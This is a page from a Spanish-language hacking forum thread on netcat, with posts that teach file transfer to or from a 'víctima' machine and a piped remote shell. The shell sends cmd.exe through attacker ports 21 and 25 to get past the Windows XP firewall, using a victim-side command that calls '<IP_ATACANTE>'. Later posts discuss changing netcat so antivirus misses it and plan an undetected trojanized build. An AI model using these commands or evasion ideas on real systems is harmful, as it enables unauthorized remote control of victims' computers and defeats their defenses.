elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Top 20 herramientas Hacking más populares de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 276,540 veces)
octalh


Desconectado Desconectado

Mensajes: 518


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #40 en: 1 Abril 2007, 22:49 pm »

Bueno aqui esta mi aportacion XD  ;D

JUGANDO CON NETCAT
V

NETCAT PARA TRANSFERENCIA DE ARCHIVOS
no tendran que usar FTP ni TFTP una ves teniendo NC  en la victima


Lo primero sera prepararnos como servidor [ atacante ] para que el cliente [ victima ] posteriormente conecte a nosotros y descarge el file

sintaxis

Código:
nc -l -p PUERTO < FILE



Ahora desde la shell de la victima conectaremos a nosotros y recibiremos el file

sintaxis:

Código:
nc IP PUERTO > FILE



Ahora esperaremos un momento [ parecera que se colgo la shell ] pero no XD ... para comprobar que ya se descargo realizamos un dir en el servidor destino



como pueden ver el tamaño es de 700.416 bytes por lo tanto el archivo a sido descargado con exito

ahora solo queda precionar CTRL+C en la shell del cliente para detener el comando

bueno eso es todo salu2 y suerte

bytes..
« Última modificación: 1 Abril 2007, 22:51 pm por octalh » En línea

ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #41 en: 1 Abril 2007, 23:11 pm »

En vez de
Código:
nc -l -p PUERTO < FILE

tambien podemos usar un :

Código:
type archivo | nc IP PUERTO
si la vicitma tiene un puerto en escucha, o si en puerto en escucha es el nuestro:

Código:
type archivo | nc -L -p PUERTO

Prefiero usar el metodo de conectarte... usar puerto 21 que el firewall SP2 no cantara....
En línea

octalh


Desconectado Desconectado

Mensajes: 518


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #42 en: 1 Abril 2007, 23:16 pm »

jaja nunca se me ocurrio hacerlo en modo pipeado

buen tip neox  ;D
En línea

ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #43 en: 1 Abril 2007, 23:29 pm »

Gracias.

A esto le falta un " Jugando con el Netcat VI ", shell pipelada o volteada...

Voy a ponerme a hacerlo.
En línea

ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #44 en: 1 Abril 2007, 23:44 pm »

Jugando con Netcat VI


Shell volteada o pipelada:


Bien hasta ahora nosotros conocemos la tecnica de la shell directa e inversa, probemos la inversa, nos las ingeniamos para que la victima deje un puerto a la escucha...




Este comando camuflado con el metodo del iexplore tendria el mismo efecto, hace saltar el firewall de XP SP2 !!, y por lo tanto nosotros no nos podemos conectar a la victima...



EL firewall de XP SP2 detecta que actua como un servidor y lo bloquea!!

Asi, que que podemos hacer ??, pues una shell pipelada o volteada.

Esta técnica se basa en que la mayoria de los firewall aceptan la entrada de datos por el puerto 21 y la salida de estos por el puerto 25, de esta manera podemos burlar al firewall sin matarlo ni agregar el Netcat a la lista de excepciones.

El atacante deberá ejecutar los comandos:


nc –vv –L –p 21
  --> La ventana por la que dará las ordenes
nc –vv –L –p 25 --> La ventana por la cual verá el resultado de las mismas.




Y la víctima debe ejecutar:
 
nc –d <IP_ATACANTE> 80 | cmd.exe | nc –d <IP_ATACANTE> 25




Explicacion:

Usamos " pipes ", esto es basicamente un metodo para transmitir datos entre programas, nos conectamos al puerto 21 del atacante, todo lo que recibamos por ese puerto será redirigido a cmd.exe usando " | ", el resultado que dé cmd.exe será a la vez redirigido a la conexion que tenemos con el puerto 25 de la victima.

Por ese motivo las ordenes o comandos debemos escribirlos en la ventana en la que escuchemos el puerto 21 y recibiremos el resultado en el puerto 25.

Por que usamos el puerto 21 (FTP) ?

Pues por que el firewall de XP SP2 admite por defecto la entrada de datos por dicho puertos, como tambien la admite por el puerto 80, etc...

Por que usamos el puerto 25 (SMTP) ?

Pues basicamente lo mismo que lo anterior, pero en este caso lo permitido es la salida de datos.



Entonces en la nos saldra esto:





En la ventana donde escuchamos el puerto 21 escribiremos los comandos y en la que usamos el puerto 25 veremos el resultado...

Y todo esto sin que el firewall no diga ni pio!!, la unica forma de que nos funcione un Netcatt troyanizado usando unicamente el Netcat para esquivar el firewall...

« Última modificación: 2 Abril 2007, 23:16 pm por ne0x » En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #45 en: 1 Abril 2007, 23:53 pm »

Este post esta quedando realmente muy completo... pero de cualquier manera hay que ver que varios de los metodos que se usan aqui estan en el paper de zhyzura

 :-X
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #46 en: 2 Abril 2007, 22:21 pm »

Sobretodo el de shell pipelada o volteada, lo que pasa es que yo veia necesario explicarlo, es el unico metodo de saltarse el firewall unicamente usando el Netcat...

Ya estan puestas las fotos de Jugando con netcat VI
« Última modificación: 2 Abril 2007, 23:19 pm por ne0x » En línea

WHK
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.345


The Hacktivism is not a crime


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #47 en: 3 Abril 2007, 00:33 am »

jajajajaja muy bueno grax por el aporte XD
« Última modificación: 3 Abril 2007, 00:35 am por WHK » En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
NewLog


Desconectado Desconectado

Mensajes: 329



Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #48 en: 3 Abril 2007, 01:46 am »

Yo tengo una duda.

El código de nc es abierto verdad? En el caso de que lo fuera... No habría modo alguno de que añadiendo código el antivirus no lo detectara?

Quizá es muy avanzado para este hilo pero siempre me lo he preguntado... y con una respuesta de que es posible (sin cambiar todo el nc) me basta!

Gracias!
En línea

WHK
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.345


The Hacktivism is not a crime


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #49 en: 3 Abril 2007, 02:15 am »

Si se puede, trataré de aprender mas sobre el metodo RIT para poder darles un netcat que no sea detectado, pero porfavor si llego a hacerlo traten de no ponerlo en ninguna pagina web para que no lo buelvan a detectar, si alguien lo hace rimero vienvenido sea porque creo que me voy a demorar mucho en hacerlo  :-\
En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines